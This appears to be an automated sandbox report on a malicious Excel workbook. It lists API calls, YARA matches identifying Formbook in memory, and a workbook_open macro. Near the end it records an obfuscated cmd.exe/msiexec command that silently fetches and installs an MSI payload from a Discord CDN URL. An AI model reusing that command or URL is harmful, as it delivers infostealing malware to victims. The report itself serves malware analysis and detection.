          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F10D0 NtOpenProcessToken,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0060 NtQuerySection,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F01D4 NtSetValueKey,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F010C NtOpenDirectoryObject,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1148 NtOpenThread,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F07AC NtCreateMutant,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF8CC NtWaitForSingleObject,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF938 NtWriteFile,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1930 NtSetContextThread,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAB8 NtQueryValueKey,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFA20 NtQueryInformationFile,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFA50 NtEnumerateValueKey,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFB50 NtCreateKey,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC30 NtOpenProcess,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC48 NtSetInformationFile,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0C40 NtGetContextThread,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1D80 NtSuspendThread,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFD5C NtEnumerateKey,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFFFC NtCreateProcessEx,
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099E00 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099E80 NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099DFB NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E9DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Installer\MSID8B1.tmpJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FE0C6
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092D005
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091905A
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00903040
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FE2E9
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A1238
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FF3CF
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009263DB
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00902305
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00907353
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0094A37B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00935485
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00911489
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0093D47D
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091C5F0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090351F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00904680
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090E6C1
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A2622
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0098579A
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090C7BC
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009357C3
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0099F8EE
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090C85C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092286D
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A098E
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009029B2
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009169FE
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00985955
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009B3A83
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009ACBA4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0098DBDA
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FFBD7
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00927B00
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0099FDDD
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00930D3B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090CD5B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00932E2F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091EE4C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00910F3F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A1238
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FE2E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02202305
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0224A37B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02207353
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A63BF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FF3CF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022263DB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222D005
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02203040
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221905A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FE0C6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A2622
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0224A634
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02204680
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220E6C1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220C7BC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0228579A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022357C3
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0223D47D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02235485
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02211489
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02246540
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221C5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022B3A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02227B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022ACBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FFBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0228DBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220C85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0229F8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02285955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022029B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022169FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02232E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221EE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02210F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02230D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0229FDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009E071
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009E5FC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082D87
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00089E30
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082FB0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E9862
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E1069
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E1072
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E8132
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EDA6F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EAA32
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EDB0E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E5B1F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E5B22
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E2CEC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E2CF2
          Source: 0d69e4f6_by_Libranalysis.xlsOLE, VBA macro line: Private Sub workbook_open()
          Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function workbook_open
          Source: 0d69e4f6_by_Libranalysis.xlsOLE indicator, VBA macros: true
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0226F970 appears 81 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 021FDF5C appears 118 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 021FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0224373B appears 238 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 02243F92 appears 108 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 008FE2A8 appears 38 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 0096F970 appears 81 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 008FDF5C appears 110 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 0094373B appears 238 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00943F92 appears 108 times
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/4@6/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBB7.tmpJump to behavior
          Source: 0d69e4f6_by_Libranalysis.xlsOLE indicator, Workbook stream: true
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 0d69e4f6_by_Libranalysis.xlsReversingLabs: Detection: 38%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: unknownProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
